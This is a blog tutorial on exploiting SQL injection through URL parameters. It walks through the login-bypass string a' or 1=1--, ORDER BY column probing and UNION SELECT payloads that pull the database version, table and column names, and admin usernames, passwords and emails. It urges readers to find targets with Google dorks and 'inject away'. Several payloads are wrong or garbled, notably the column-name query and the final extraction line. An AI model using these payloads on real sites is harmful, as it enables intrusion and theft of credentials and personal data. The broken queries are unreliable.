Introduction
SQL Injections are by far the most common, useful, versatile, and simple hack to accomplish on a vulnerable web server.
An SQL injection exploits the developers errors instead of exploiting a server or service installed on the host machine. SQL injection vulnerabilities are caused when information provided is not checked before being sent to the database.
Example:
SQL Syntax: SELECT * FROM users WHERE username='&username'; If you send the text myname the query becomes: SELECT * FROM users WHERE username='myname'; The problem is when we pass more SQL information instead of a username like a' or 1=1--. In this case the SQL query becomes: SELECT * FROM users WHERE username='a' or 1=1--
This means that all rows from the table users will be selected. This means we will be able to harvest information from the table like emails, names, passwords, or even sometimes credit card numbers.
Getting Started
In this tutorial we will be covering exploiting a URL with an SQL injection. After you find a host using a Google dork or by having a target in mind we can see if it is vunerable by simply trying a simple injection and looking for an error.
http://site.com/index.php?id=5 ORDER BY 1--
The text in bold is the text that was added to make an SQL injection. If you get some sort of SQL error in the web page, or if some content disappears or something like that, the page is vulnerable to being attacked.
Now we need to find out the number of columns are on the table. To do this we will just keep increasing the number in ORDER BY until we get an error. If we get an error on ORDER BY 7-- we know there is no 7th column.
http://site.com/index.php?id=5 ORDER BY 1-- [No Error!] http://site.com/index.php?id=5 ORDER BY 2-- [No Error!] http://site.com/index.php?id=5 ORDER BY 3-- [No Error!] http://site.com/index.php?id=5 ORDER BY 4-- [No Error!] http://site.com/index.php?id=5 ORDER BY 5-- [No Error!] http://site.com/index.php?id=5 ORDER BY 6-- [No Error!] http://site.com/index.php?id=5 ORDER BY 7-- [Browser displayed error]
We know there are 6 columns, so lets use a command to find the vulnerable columns called UNION SELECT
http://site.com/index.php?id=5 UNION SELECT 1,2,3,4,5,6--
Look on the page for misplaced numbers. If you are having issues finding the numbers try changing the id (or whatever the GET variable is) to -1. There is rarely ids in the negative values so it will clear the content except for our injection data.
The numbers you get are the vulnerable tables. We are going to use those numbers to farm information about the server, and get information out of the tables. For the example we are going to assume that the second column is vulnerable.
Get database Version
http://site.com/index.php?id=5 UNION SELECT 1,version(),3,4,5,6--
Get Table Names
http://site.com/index.php?id=5 UNION SELECT 1,group_concat(table_name),3,4,5,6 from information_schema.tables--
Get Column Names
http://site.com/index.php?id=5 UNION SELECT 1,group_concat(column_name),3,4,5,6 from information_schema.tables where table_name='admin'--
Extract Data
http://site.com/index.php?id=5 UNION SELECT 1,group_concat(column_name),3,4,5,6 1,2,group_concat(username,0x3a,password,0x3a,email) from admin--
So by extracting the table and column names you can build a query to extract any information from any table. You know the entire database structure now, so just pick and choose what you want and inject away
Terimakasih anda telah membaca artikel tentang SQL injection. Jika ingin menduplikasi artikel ini diharapkan anda untuk mencantumkan link https://pirateddevil.blogspot.com/2013/11/sql-injection.html. Terimakasih atas perhatiannya.